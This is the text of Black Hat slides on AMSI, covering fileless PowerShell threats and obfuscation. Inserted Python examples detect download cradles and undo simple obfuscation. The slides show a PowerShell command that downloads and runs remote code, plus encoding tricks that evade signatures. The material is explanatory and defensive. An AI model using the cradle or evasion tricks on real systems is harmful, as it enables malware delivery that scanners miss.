The Rise and Fall of AMSI - Black Hat Briefings
@Tal_Liberman
About me
@Tal_Liberman
Research & Reverse Engineering
Founder @ Polarium
Previously Head of Research Team @ enSilo
#ProcessDoppelgänging #AtomBombing
Overview
Introduction
Script Based & Fileless Threats
Obfuscation
The Cat and Mouse Game
AMSI Overview
AMSI from the Developer's Perspective
AMSI from the Security Vendor's Perspective
Building and Registering Your Own AMSI Provider
Bypassing AMSI
Final Thoughts
Script Based Threats
"Script-based malware - on the rise"
This is not a trend - it's mainstream
There are more script based threats than there are binary threats*
Why scripts?
- Already available on all target machines
- Vastly used in domain settings
- Scripts are faster to develop
- Minimal skills needed to achieve good functionality
- Obfuscation of text is more simple than of machine code
- Harder to monitor scripts than compiled executables
Fileless Threats
A file always has to be run
Assuming the malware survives a reboot
But it can be a MS signed executable being abused
Notorious examples are Poweliks and Kovter
The main idea is to use a scripting engine to run code via command line
Example:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')"
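In a fileless attack the command line above is the whole "file", so process-creation telemetry is the natural place to look. The following is an added example, not from the slides and written in Python rather than PowerShell: it resolves the abbreviated switches powershell.exe accepts (`-nop`, `-exec`, `-c`, `-e`) to their full names, decodes an `-EncodedCommand` payload, and flags the combination of Invoke-Expression with a download call. The switch table and the minimum prefix lengths are modelled on how powershell.exe matches its switches and are an assumption of this example; the three sample command lines are constructed, the first being the slide's own.

```python
"""Added example (not from the slides): normalise a powershell.exe command line
the way the host parses it, then look for the download-cradle pattern shown
on the slide. Switch prefix lengths are modelled on powershell.exe's own
switch matching and are an assumption of this example."""
import base64
import re

# Canonical switch name and the shortest prefix powershell.exe accepts for it.
# Order matters: "-ex" must resolve to ExecutionPolicy before "-e" falls
# through to EncodedCommand.
SWITCHES = [
    ("NoProfile", "nop"),
    ("NoLogo", "nol"),
    ("NonInteractive", "noni"),
    ("NoExit", "noe"),
    ("WindowStyle", "w"),
    ("Command", "c"),
    ("ExecutionPolicy", "ex"),
    ("EncodedCommand", "e"),
    ("File", "f"),
]
TAKES_VALUE = {"WindowStyle", "ExecutionPolicy", "EncodedCommand", "File"}

# Indicators of "a scripting engine pulls code over the network and runs it".
INDICATORS = {
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download": re.compile(r"downloadstring|downloadfile|downloaddata", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
}


def expand_switch(token):
    """'-nop', '/exec', '-ExecutionPolicy' -> canonical switch name, else None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    key = token[1:].lower()
    for name, shortest in SWITCHES:
        if len(key) >= len(shortest) and name.lower().startswith(key):
            return name
    return None


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def encode_command(script):
    """Inverse of decode_encoded_command; used only to build constructed sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(cmdline):
    """Return normalised switches, the script text that would run, and cradle indicators."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    switches, payload = {}, ""
    i = 1  # tokens[0] is the executable
    while i < len(tokens):
        name = expand_switch(tokens[i])
        if name == "Command" or name is None:
            # -Command, and any bare trailing text, is the script to execute.
            rest = tokens[i + 1:] if name == "Command" else tokens[i:]
            payload = " ".join(rest).strip('"')
            switches["Command"] = payload
            break
        value = None
        if name in TAKES_VALUE and i + 1 < len(tokens):
            value = tokens[i + 1].strip('"')
            i += 1
        switches[name] = value
        if name == "EncodedCommand":
            payload = decode_encoded_command(value or "")
        i += 1
    found = sorted(k for k, rx in INDICATORS.items() if rx.search(payload))
    return {
        "switches": switches,
        "payload": payload,
        "indicators": found,
        "cradle": "invoke-expression" in found and "download" in found,
    }


if __name__ == "__main__":
    # Constructed samples: the slide's cradle, an encoded variant, and a benign run.
    samples = [
        "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('')\"",
        "powershell -w hidden -e " + encode_command("IEX (New-Object Net.WebClient).DownloadString('')"),
        r"powershell -NoProfile -File C:\scripts\backup.ps1",
    ]
    for sample in samples:
        result = analyze_command_line(sample)
        print(result["cradle"], result["switches"], result["indicators"])
```

Matching on the normalised switch names rather than the raw text is what keeps a rule from being sidestepped by `-ExecutionPolicy` versus `-exec` versus `-ep`, and decoding `-EncodedCommand` before matching is what lets the same indicator list cover the encoded variant.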
Obfuscation
In software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand -Wikipedia.
Well... except for the word "humans".
The Cat and Mouse Game
Let's start with a simple example:
function Invoke-Malware { Write-Host 'Malware!'; }
Simple signature: if script contains "Write-Host 'Malware'" -> Malicious
Simple bypass:
function Invoke-Malware { Write-Host "Malware!"; }
Simple signature: if re.findall("Write-Host .Malware.", script) -> Malicious
Simple bypass:
function Invoke-Malware { Write-Host ("Mal" + "ware!"); }
The Cat and Mouse Game
Let's start being a little more sophisticated (just a bit):
function Invoke-NotMalware { $malware_base64 = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi"; $malware = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }
Simple signature: if script contains "V3JpdGUtSG9zdCAiTWFsd2FyZSEi" -> Malicious
Simple bypass:
function Invoke-NotMalware { $malware_base64 = "VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAdwBhAHIAZQAhACIA"; $malware = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }
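Each bypass on these slides defeats one literal signature, and each falls to one normalisation step applied before matching: tolerate either quote style, fold string concatenation, and decode base64 in both the ASCII and the UTF-16LE encoding before rescanning. The following is an added example, not from the slides: a Python scanner that applies those layers in turn to the scripts above (embedded as sample input) and reports the layer at which the signature fired. The signature is the slide's regular expression loosened to tolerate a parenthesis; the concatenation folding and the base64 handling are this example's own assumptions about what a static scanner would do. The gap they leave, every further encoding needing its own layer, is what AMSI closes by handing the script to the scanner at execution time, after the engine has done the decoding itself.

```python
"""Added example (not from the slides): the obfuscation layers shown above,
undone one at a time before a signature is applied."""
import base64
import re

# The slide's regex "Write-Host .Malware." loosened to allow up to three
# non-word characters (space, quote, parenthesis) between command and string.
SIGNATURE = re.compile(r"Write-Host\W{1,3}Malware", re.I)

# "Mal" + "ware!"  ->  "Malware!"  (either quote style on either side)
CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")

# Runs long enough to be a base64 blob rather than an ordinary identifier.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# The scripts from the slides, embedded here as sample input.
SAMPLE_SCRIPTS = {
    "single-quote": "function Invoke-Malware { Write-Host 'Malware!'; }",
    "double-quote": 'function Invoke-Malware { Write-Host "Malware!"; }',
    "concat": 'function Invoke-Malware { Write-Host ("Mal" + "ware!"); }',
    "base64-ascii": (
        'function Invoke-NotMalware { $malware_base64 = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi"; '
        "$malware = [System.Text.Encoding]::ASCII.GetString("
        "[System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }"
    ),
    "base64-unicode": (
        "function Invoke-NotMalware { $malware_base64 = "
        '"VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAdwBhAHIAZQAhACIA"; '
        "$malware = [System.Text.Encoding]::UNICODE.GetString("
        "[System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }"
    ),
}


def fold_concatenation(script):
    """Join adjacent string literals until no '"a" + "b"' pattern remains."""
    previous = None
    while previous != script:
        previous = script
        script = CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', script)
    return script


def decode_base64_runs(script):
    """Decode every base64-looking run as UTF-16LE and as ASCII, keeping printable text."""
    texts = []
    for match in B64_RUN.finditer(script):
        run = match.group(0)
        try:
            data = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        for codec in ("utf-16-le", "ascii"):
            try:
                text = data.decode(codec)
            except UnicodeDecodeError:
                continue
            if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
                texts.append(text)
    return texts


def scan(script, depth=0, max_depth=3):
    """Return the layer at which SIGNATURE fires ('plain', 'concat-folded',
    'base64-depth-N') or None if nothing matches after all layers."""
    if SIGNATURE.search(script):
        return "plain" if depth == 0 else f"base64-depth-{depth}"
    if SIGNATURE.search(fold_concatenation(script)):
        return "concat-folded" if depth == 0 else f"base64-depth-{depth}"
    if depth >= max_depth:
        return None
    for text in decode_base64_runs(script):
        hit = scan(text, depth + 1, max_depth)
        if hit:
            return hit
    return None


if __name__ == "__main__":
    for label, script in SAMPLE_SCRIPTS.items():
        print(f"{label:15s} -> {scan(script)}")
```

The recursion in `scan` is what handles a blob whose decoded content is itself another base64 blob; the depth cap keeps a deliberately self-referential input from running forever.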